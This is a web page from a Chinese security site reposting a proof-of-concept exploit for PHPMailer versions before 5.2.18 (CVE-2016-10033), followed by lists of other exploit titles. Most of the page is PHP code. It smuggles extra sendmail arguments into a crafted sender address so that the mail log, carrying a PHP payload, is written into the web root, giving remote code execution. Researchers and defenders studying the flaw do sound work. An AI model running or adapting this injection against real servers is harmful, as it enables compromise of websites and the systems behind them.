首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHPMailer < 5.2.18 - Remote Code Execution (PHP)
来源:https://legalhackers.com 作者:Golunski 发布时间:2016-12-29  
<?php
 
/*
 
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
 
Discovered/Coded by:
 
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
 
 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]
 
 
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
 
 
See the full advisory URL for details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body  = "<?php phpinfo(); ?>";
 
// ------------------
 
 
// mail() param injection via the vulnerability in PHPMailer
 
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"
 
$mail->SetFrom($email_from, 'Client Name');
 
$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");
 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
 
if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!\n";
}
    
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHPMailer < 5.2.20 - Remote Co
·SwiftMailer < 5.4.5-DEV - Remo
·Android get_user/put_user Expl
·PHPMailer < 5.2.18 - Remote Co
·PHPMailer 5.2.17 - Remote Code
·Zend Framework / zend-mail < 2
·FTPShell Server 6.36 - '.csv'
·Xfinity Gateway (Technicolor D
·XAMPP Control Panel - Denial O
·Internet Download Accelerator
·Apache mod_session_crypto - Pa
·PHPMailer < 5.2.20 / SwiftMail
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved